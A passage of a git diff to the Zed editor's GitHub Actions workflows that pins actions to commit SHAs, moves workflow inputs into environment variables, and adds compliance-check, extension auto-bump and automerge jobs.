&& git checkout ${{ inputs.base }} + run: git fetch origin "$REF_NAME" && git checkout "$REF_NAME" + env: + REF_NAME: ${{ inputs.base }} - name: compare_perf::run_perf::cargo_perf_test run: |2- - if [ -n "${{ inputs.crate_name }}" ]; then - cargo perf-test -p ${{ inputs.crate_name }} -- --json=${{ inputs.base }}; + if [ -n "$CRATE_NAME" ]; then + cargo perf-test -p "$CRATE_NAME" -- --json="$REF_NAME"; else - cargo perf-test -p vim -- --json=${{ inputs.base }}; + cargo perf-test -p vim -- --json="$REF_NAME"; fi + env: + REF_NAME: ${{ inputs.base }} + CRATE_NAME: ${{ inputs.crate_name }} - name: steps::git_checkout - run: git fetch origin ${{ inputs.head }} && git checkout ${{ inputs.head }} + run: git fetch origin "$REF_NAME" && git checkout "$REF_NAME" + env: + REF_NAME: ${{ inputs.head }} - name: compare_perf::run_perf::cargo_perf_test run: |2- - if [ -n "${{ inputs.crate_name }}" ]; then - cargo perf-test -p ${{ inputs.crate_name }} -- --json=${{ inputs.head }}; + if [ -n "$CRATE_NAME" ]; then + cargo perf-test -p "$CRATE_NAME" -- --json="$REF_NAME"; else - cargo perf-test -p vim -- --json=${{ inputs.head }}; + cargo perf-test -p vim -- --json="$REF_NAME"; fi + env: + REF_NAME: ${{ inputs.head }} + CRATE_NAME: ${{ inputs.crate_name }} - name: compare_perf::run_perf::compare_runs - run: cargo perf-compare --save=results.md ${{ inputs.base }} ${{ inputs.head }} + run: cargo perf-compare --save=results.md "$BASE" "$HEAD" + env: + BASE: ${{ inputs.base }} + HEAD: ${{ inputs.head }} - name: '@actions/upload-artifact results.md' uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4 with: diff --git a/.github/workflows/compliance_check.yml b/.github/workflows/compliance_check.yml new file mode 100644 index 0000000000000000000000000000000000000000..f09c460c233b04e78df01e7828b4def737dec16e --- /dev/null +++ b/.github/workflows/compliance_check.yml @@ -0,0 +1,55 @@ +# Generated from xtask::workflows::compliance_check +# Rebuild with `cargo xtask workflows`. +name: compliance_check +env: + CARGO_TERM_COLOR: always +on: + schedule: + - cron: 30 17 * * 2 +jobs: + scheduled_compliance_check: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-2x4-ubuntu-2404 + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - id: determine-version + name: compliance_check::scheduled_compliance_check + run: | + VERSION=$(sed -n 's/^version = "\(.*\)"/\1/p' crates/zed/Cargo.toml | tr -d '[:space:]') + if [ -z "$VERSION" ]; then + echo "Could not determine version from crates/zed/Cargo.toml" + exit 1 + fi + TAG="v${VERSION}-pre" + echo "Checking compliance for $TAG" + echo "tag=$TAG" >> "$GITHUB_OUTPUT" + - id: run-compliance-check + name: compliance_check::scheduled_compliance_check::run_compliance_check + run: cargo xtask compliance "$LATEST_TAG" --branch main --report-path target/compliance-report + env: + LATEST_TAG: ${{ steps.determine-version.outputs.tag }} + GITHUB_APP_ID: ${{ secrets.ZED_ZIPPY_APP_ID }} + GITHUB_APP_KEY: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + - name: compliance_check::scheduled_compliance_check::send_failure_slack_notification + if: failure() + run: | + MESSAGE="⚠️ Scheduled compliance check failed for upcoming preview release $LATEST_TAG: There are PRs with missing reviews." + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + env: + SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + LATEST_TAG: ${{ steps.determine-version.outputs.tag }} +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/congrats.yml b/.github/workflows/congrats.yml index 6a4111a1c5b5143ee9be067911207d5b4ca1448c..4866b3c33bc6bab9f9d20ac1701b7d6535b356ee 100644 --- a/.github/workflows/congrats.yml +++ b/.github/workflows/congrats.yml @@ -13,7 +13,7 @@ jobs: steps: - name: Get PR info and check if author is external id: check - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b # v7 with: github-token: ${{ secrets.CONGRATSBOT_GITHUB_TOKEN }} script: | @@ -29,6 +29,13 @@ jobs: } const mergedPR = prs.find(pr => pr.merged_at !== null) || prs[0]; + + if (mergedPR.user.type === "Bot") { + // They are a good bot, but not good enough to be congratulated + core.setOutput('should_congratulate', 'false'); + return; + } + const prAuthor = mergedPR.user.login; try { @@ -50,7 +57,7 @@ jobs: congrats: needs: check-author if: needs.check-author.outputs.should_congratulate == 'true' - uses: withastro/automation/.github/workflows/congratsbot.yml@main + uses: withastro/automation/.github/workflows/congratsbot.yml@a5bd0c5748c4d56e687cdd558064f9ee8adfb1f2 # main with: EMOJIS: 🎉,🎊,🧑‍🚀,🥳,🙌,🚀,🦀,🔥,🚢 secrets: diff --git a/.github/workflows/danger.yml b/.github/workflows/danger.yml index 62f799baae1fb64a31807030c5700019a3d2c1b7..62739b21675fec2b4289b646fec794846c5fe783 100644 --- a/.github/workflows/danger.yml +++ b/.github/workflows/danger.yml @@ -16,7 +16,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_pnpm diff --git a/.github/workflows/deploy_cloudflare.yml b/.github/workflows/deploy_cloudflare.yml index 2650cce1406b16e691565077b95d07730845664b..4e029c63ccd8a022ac9d6107748f964585058735 100644 --- a/.github/workflows/deploy_cloudflare.yml +++ b/.github/workflows/deploy_cloudflare.yml @@ -13,7 +13,7 @@ jobs: steps: - name: Checkout repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: clean: false @@ -23,7 +23,10 @@ jobs: - name: Build docs uses: ./.github/actions/build_docs env: + CC: clang + CXX: clang++ DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + DOCS_CONSENT_IO_INSTANCE: ${{ secrets.DOCS_CONSENT_IO_INSTANCE }} - name: Deploy Docs uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 diff --git a/.github/workflows/deploy_collab.yml b/.github/workflows/deploy_collab.yml index b1bdaf61979452a73380226ce1935b43eb05c32b..5a3eff186814128ebb3973642040d9228f0e87fd 100644 --- a/.github/workflows/deploy_collab.yml +++ b/.github/workflows/deploy_collab.yml @@ -12,9 +12,12 @@ jobs: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') name: Check formatting and Clippy lints runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -23,14 +26,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_fmt @@ -42,9 +43,12 @@ jobs: - style name: Run tests runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -53,18 +57,16 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: deploy_collab::tests::run_collab_tests @@ -91,7 +93,7 @@ jobs: - name: deploy_collab::publish::sign_into_registry run: doctl registry login - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: deploy_collab::publish::build_docker_image @@ -111,7 +113,7 @@ jobs: runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: deploy_collab::deploy::install_doctl @@ -119,8 +121,9 @@ jobs: with: token: ${{ secrets.DIGITALOCEAN_ACCESS_TOKEN }} - name: deploy_collab::deploy::sign_into_kubernetes - run: | - doctl kubernetes cluster kubeconfig save --expiry-seconds 600 ${{ secrets.CLUSTER_NAME }} + run: doctl kubernetes cluster kubeconfig save --expiry-seconds 600 "$CLUSTER_NAME" + env: + CLUSTER_NAME: ${{ secrets.CLUSTER_NAME }} - name: deploy_collab::deploy::start_rollout run: | set -eu @@ -140,7 +143,7 @@ jobs: echo "Deploying collab:$GITHUB_SHA to $ZED_KUBE_NAMESPACE" source script/lib/deploy-helpers.sh - export_vars_for_environment $ZED_KUBE_NAMESPACE + export_vars_for_environment "$ZED_KUBE_NAMESPACE" ZED_DO_CERTIFICATE_ID="$(doctl compute certificate list --format ID --no-header)" export ZED_DO_CERTIFICATE_ID @@ -150,14 +153,14 @@ jobs: export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_COLLAB_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=850 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" export ZED_SERVICE_NAME=api export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_API_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=60 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" defaults: run: diff --git a/.github/workflows/docs_suggestions.yml b/.github/workflows/docs_suggestions.yml index c2dc8b4d5197bcbf38dbfb92dac8c23386726d53..c3d04d5780b290c81470dea16d11f473ee7361b1 100644 --- a/.github/workflows/docs_suggestions.yml +++ b/.github/workflows/docs_suggestions.yml @@ -64,7 +64,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} @@ -296,7 +296,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.base.ref || '' }} diff --git a/.github/workflows/extension_auto_bump.yml b/.github/workflows/extension_auto_bump.yml new file mode 100644 index 0000000000000000000000000000000000000000..e48ccdb082a3620741ad0e79877c505f9b2aa4de --- /dev/null +++ b/.github/workflows/extension_auto_bump.yml @@ -0,0 +1,80 @@ +# Generated from xtask::workflows::extension_auto_bump +# Rebuild with `cargo xtask workflows`. +name: extension_auto_bump +on: + push: + branches: + - main + paths: + - extensions/** + - '!extensions/test-extension/**' + - '!extensions/workflows/**' + - '!extensions/*.md' +jobs: + detect_changed_extensions: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-2x4-ubuntu-2404 + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 2 + - id: detect + name: extension_auto_bump::detect_changed_extensions + run: | + COMPARE_REV="$(git rev-parse HEAD~1)" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + # Filter out deleted extensions + EXISTING_EXTENSIONS="" + for ext in $CHANGED_EXTENSIONS; do + if [ -f "$ext/extension.toml" ]; then + EXISTING_EXTENSIONS=$(printf '%s\n%s' "$EXISTING_EXTENSIONS" "$ext") + fi + done + CHANGED_EXTENSIONS=$(echo "$EXISTING_EXTENSIONS" | sed '/^$/d') + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + # Filter out newly added extensions + FILTERED="[]" + for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do + if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1; then + FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. + [$e]') + fi + done + echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT" + outputs: + changed_extensions: ${{ steps.detect.outputs.changed_extensions }} + timeout-minutes: 5 + bump_extension_versions: + needs: + - detect_changed_extensions + if: needs.detect_changed_extensions.outputs.changed_extensions != '[]' + permissions: + actions: write + contents: write + issues: write + pull-requests: write + strategy: + matrix: + extension: ${{ fromJson(needs.detect_changed_extensions.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_bump.yml + secrets: + app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} + app-secret: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + with: + working-directory: ${{ matrix.extension }} + force-bump: false +concurrency: + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + cancel-in-progress: true +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/extension_bump.yml b/.github/workflows/extension_bump.yml index b7bb78363ce4ff97680b2a53967938280c3de902..b4cbac4ec8c0ab37ebad73eb96c2ee074ca969a6 100644 --- a/.github/workflows/extension_bump.yml +++ b/.github/workflows/extension_bump.yml @@ -5,7 +5,7 @@ env: CARGO_TERM_COLOR: always RUST_BACKTRACE: '1' CARGO_INCREMENTAL: '0' - ZED_EXTENSION_CLI_SHA: 03d8e9aee95ea6117d75a48bcac2e19241f6e667 + ZED_EXTENSION_CLI_SHA: 1fa7f1a3ec28ea1eae6db2e937d7a538fb10c0c7 on: workflow_call: inputs: @@ -17,6 +17,10 @@ on: description: force-bump required: true type: boolean + working-directory: + description: working-directory + type: string + default: . secrets: app-id: description: The app ID used to create the PR @@ -30,7 +34,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -39,11 +43,9 @@ jobs: run: | CURRENT_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" - if [[ "${{ github.event_name }}" == "pull_request" ]]; then + if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -59,6 +61,10 @@ jobs: version_changed: ${{ steps.compare-versions-check.outputs.version_changed }} current_version: ${{ steps.compare-versions-check.outputs.current_version }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} bump_extension_version: needs: - check_version_changed @@ -68,22 +74,25 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.app-id }} private-key: ${{ secrets.app-secret }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup - name: extension_bump::install_bump_2_version run: pip install bump2version --break-system-packages - id: bump-version name: extension_bump::bump_version run: | - OLD_VERSION="${{ needs.check_version_changed.outputs.current_version }}" - BUMP_FILES=("extension.toml") if [[ -f "Cargo.toml" ]]; then BUMP_FILES+=("Cargo.toml") @@ -93,29 +102,59 @@ jobs: --search "version = \"{current_version}"\" \ --replace "version = \"{new_version}"\" \ --current-version "$OLD_VERSION" \ - --no-configured-files ${{ inputs.bump-type }} "${BUMP_FILES[@]}" + --no-configured-files "$BUMP_TYPE" "${BUMP_FILES[@]}" if [[ -f "Cargo.toml" ]]; then - cargo update --workspace + cargo +stable update --workspace fi NEW_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + { + echo "title=Bump version to ${NEW_VERSION}"; + echo "body=This PR bumps the version of this extension to v${NEW_VERSION}"; + echo "branch_name=zed-zippy-autobump"; + } >> "$GITHUB_OUTPUT" + else + { + echo "title=${EXTENSION_ID}: Bump to v${NEW_VERSION}"; + echo "body<> "$GITHUB_OUTPUT" + fi echo "new_version=${NEW_VERSION}" >> "$GITHUB_OUTPUT" + env: + OLD_VERSION: ${{ needs.check_version_changed.outputs.current_version }} + BUMP_TYPE: ${{ inputs.bump-type }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_pull_request - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: - title: Bump version to ${{ steps.bump-version.outputs.new_version }} - body: This PR bumps the version of this extension to v${{ steps.bump-version.outputs.new_version }} - commit-message: Bump version to v${{ steps.bump-version.outputs.new_version }} - branch: zed-zippy-autobump + title: ${{ steps.bump-version.outputs.title }} + body: ${{ steps.bump-version.outputs.body }} + commit-message: ${{ steps.bump-version.outputs.title }} + branch: ${{ steps.bump-version.outputs.branch_name }} committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> base: main delete-branch: true token: ${{ steps.generate-token.outputs.token }} sign-commits: true assignees: ${{ github.actor }} - timeout-minutes: 3 + timeout-minutes: 5 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} create_version_label: needs: - check_version_changed @@ -123,27 +162,48 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.app-id }} private-key: ${{ secrets.app-secret }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false + - id: determine-tag + name: extension_bump::determine_tag + run: | + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + TAG="v${CURRENT_VERSION}" + else + TAG="${EXTENSION_ID}-v${CURRENT_VERSION}" + fi + + echo "tag=${TAG}" >> "$GITHUB_OUTPUT" + env: + CURRENT_VERSION: ${{ needs.check_version_changed.outputs.current_version }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_version_tag - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b with: script: |- github.rest.git.createRef({ owner: context.repo.owner, repo: context.repo.repo, - ref: 'refs/tags/v${{ needs.check_version_changed.outputs.current_version }}', + ref: 'refs/tags/${{ steps.determine-tag.outputs.tag }}', sha: context.sha }) github-token: ${{ steps.generate-token.outputs.token }} + outputs: + tag: ${{ steps.determine-tag.outputs.tag }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} trigger_release: needs: - check_version_changed @@ -152,15 +212,15 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.app-id }} private-key: ${{ secrets.app-secret }} owner: zed-industries repositories: extensions - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - id: get-extension-id @@ -169,16 +229,85 @@ jobs: EXTENSION_ID="$(sed -n 's/id = \"\(.*\)\"/\1/p' < extension.toml)" echo "extension_id=${EXTENSION_ID}" >> "$GITHUB_OUTPUT" - - name: extension_bump::release_action - uses: huacnlee/zed-extension-action@v2 + - id: extension-update + name: extension_bump::release_action + uses: huacnlee/zed-extension-action@82920ff0876879f65ffbcfa3403589114a8919c6 with: extension-name: ${{ steps.get-extension-id.outputs.extension_id }} push-to: zed-industries/extensions - tag: v${{ needs.check_version_changed.outputs.current_version }} + tag: ${{ needs.create_version_label.outputs.tag }} env: COMMITTER_TOKEN: ${{ steps.generate-token.outputs.token }} + - name: extension_bump::enable_automerge_if_staff + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b + with: + github-token: ${{ steps.generate-token.outputs.token }} + script: | + const prNumber = process.env.PR_NUMBER; + if (!prNumber) { + console.log('No pull request number set, skipping automerge.'); + return; + } + + const author = process.env.GITHUB_ACTOR; + let isStaff = false; + try { + const response = await github.rest.teams.getMembershipForUserInOrg({ + org: 'zed-industries', + team_slug: 'staff', + username: author + }); + isStaff = response.data.state === 'active'; + } catch (error) { + if (error.status !== 404) { + throw error; + } + } + + if (!isStaff) { + console.log(`Actor ${author} is not a staff member, skipping automerge.`); + return; + } + + // Assign staff member responsible for the bump + const pullNumber = parseInt(prNumber); + + await github.rest.issues.addAssignees({ + owner: 'zed-industries', + repo: 'extensions', + issue_number: pullNumber, + assignees: [author] + }); + console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`); + + // Get the GraphQL node ID + const { data: pr } = await github.rest.pulls.get({ + owner: 'zed-industries', + repo: 'extensions', + pull_number: pullNumber + }); + + await github.graphql(` + mutation($pullRequestId: ID!) { + enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) { + pullRequest { + autoMergeRequest { + enabledAt + } + } + } + } + `, { pullRequestId: pr.node_id }); + + console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`); + env: + PR_NUMBER: ${{ steps.extension-update.outputs.pull-request-number }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-bump cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_tests.yml b/.github/workflows/extension_tests.yml index ef0e28715ce038c6ca9e38d4126b20e2276ce3c2..622f4c8f1034b4ec0c7625a361ecdb6fb84d9429 100644 --- a/.github/workflows/extension_tests.yml +++ b/.github/workflows/extension_tests.yml @@ -5,18 +5,23 @@ env: CARGO_TERM_COLOR: always RUST_BACKTRACE: '1' CARGO_INCREMENTAL: '0' - ZED_EXTENSION_CLI_SHA: 03d8e9aee95ea6117d75a48bcac2e19241f6e667 + ZED_EXTENSION_CLI_SHA: 1fa7f1a3ec28ea1eae6db2e937d7a538fb10c0c7 RUSTUP_TOOLCHAIN: stable CARGO_BUILD_TARGET: wasm32-wasip2 on: - workflow_call: {} + workflow_call: + inputs: + working-directory: + description: working-directory + type: string + default: . jobs: orchestrate: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: ${{ github.ref == 'refs/heads/main' && 2 || 350 }} @@ -32,7 +37,15 @@ jobs: git fetch origin "$GITHUB_BASE_REF" --depth=350 COMPARE_REV="$(git merge-base "origin/${GITHUB_BASE_REF}" HEAD)" fi - CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" ${{ github.sha }})" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + + # When running from a subdirectory, git diff returns repo-root-relative paths. + # Filter to only files within the current working directory and strip the prefix. + REPO_SUBDIR="$(git rev-parse --show-prefix)" + REPO_SUBDIR="${REPO_SUBDIR%/}" + if [ -n "$REPO_SUBDIR" ]; then + CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)" + fi check_pattern() { local output_name="$1" @@ -49,6 +62,10 @@ jobs: outputs: check_rust: ${{ steps.filter.outputs.check_rust }} check_extension: ${{ steps.filter.outputs.check_extension }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_rust: needs: - orchestrate @@ -56,27 +73,41 @@ jobs: runs-on: namespace-profile-8x32-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: extension_tests::install_rust_target run: rustup target add wasm32-wasip2 - - name: steps::cargo_fmt - run: cargo fmt --all -- --check + - id: get-package-name + name: extension_tests::get_package_name + run: | + PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')" + echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT" + - name: extension_tests::cargo_fmt_package + run: cargo fmt -p "$PACKAGE_NAME" -- --check + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: extension_tests::run_clippy - run: cargo clippy --release --all-features -- --deny warnings + run: cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest - - name: steps::cargo_nextest - run: 'cargo nextest run --workspace --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c + - name: extension_tests::run_nextest + run: 'cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} NEXTEST_NO_TESTS: warn timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_extension: needs: - orchestrate @@ -84,7 +115,7 @@ jobs: runs-on: namespace-profile-8x32-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + 